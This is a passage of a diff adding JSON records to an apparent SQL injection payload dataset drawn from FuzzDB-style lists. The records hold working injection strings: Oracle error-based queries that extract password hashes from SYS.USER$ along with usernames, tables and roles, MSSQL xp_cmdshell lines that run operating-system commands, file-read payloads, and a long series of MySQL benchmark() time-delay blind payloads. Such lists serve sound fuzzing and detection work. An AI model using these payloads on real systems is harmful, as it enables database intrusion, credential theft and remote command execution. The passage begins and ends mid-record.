"category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(column_name)) FROM sys.all_tab_columns)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(GRANTED_ROLE)) FROM DBA_ROLE_PRIVS WHERE GRANTEE=SYS.LOGIN_USER)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=1)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=1)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=2)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=2)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=3)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=3)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=3)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "medium", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "oracle", + "severity": "high", + "source": "FUZZDB_Oracle" + } + }, + { + "payload": "create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile;", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "FUZZDB_MySQL_ReadLocalFiles" + } + }, + { + "payload": "1'1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "FUZZDB_MYSQL" + } + }, + { + "payload": "1 exec sp_ (or exec xp_)", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mysql", + "severity": "critical", + "source": "FUZZDB_MYSQL" + } + }, + { + "payload": "1 and 1=1", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "boolean_logic", + "dbms": "mysql", + "severity": "high", + "source": "FUZZDB_MYSQL" + } + }, + { + "payload": "1' and 1=(select count(*) from tablenames); --", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mysql", + "severity": "medium", + "source": "FUZZDB_MYSQL" + } + }, + { + "payload": "select @@version", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "select @@servernamee", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "select @@microsoftversione", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "select * from master..sysserverse", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "select * from sysusers", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "exec master..xp_cmdshell 'ipconfig+/all'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "exec master..xp_cmdshell 'net+view'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "exec master..xp_cmdshell 'net+users'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "exec master..xp_cmdshell 'ping+'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "command_execution", + "dbms": "mssql", + "severity": "critical", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "BACKUP database master to disks='\\\\\\\\backupdb.dat'", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "create table myfile (line varchar(8000))\" bulk insert foo from 'c:\\inetpub\\wwwroot\\auth.asp'\" select * from myfile\"--", + "category": "sqli", + "metadata": { + "type": "generic", + "technique": "basic", + "dbms": "mssql", + "severity": "medium", + "source": "FUZZDB_MSSQL_Enumeration" + } + }, + { + "payload": "and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "' and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "' and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "' and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\" and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\" and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\" and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ") and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ") and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ") and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ")) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ")) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ")) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "))) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "))) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "))) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ")))) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ")))) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": ")))) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "') and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "') and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "') and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\") and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\") and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\") and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "')) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "')) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "')) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\")) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\")) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\")) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "'))) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "'))) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "'))) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\"))) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\"))) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "\"))) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "')))) and 0=benchmark(3000000,MD5(1))%20/*", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "')))) and 0=benchmark(3000000,MD5(1))%20--", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + "payload": "')))) and 0=benchmark(3000000,MD5(1))%20%23", + "category": "sqli", + "metadata": { + "type": "blind", + "technique": "time_delay", + "dbms": "mysql", + "severity": "medium", + "source": "payloads-sql-blind-MySQL-WHERE" + } + }, + { + 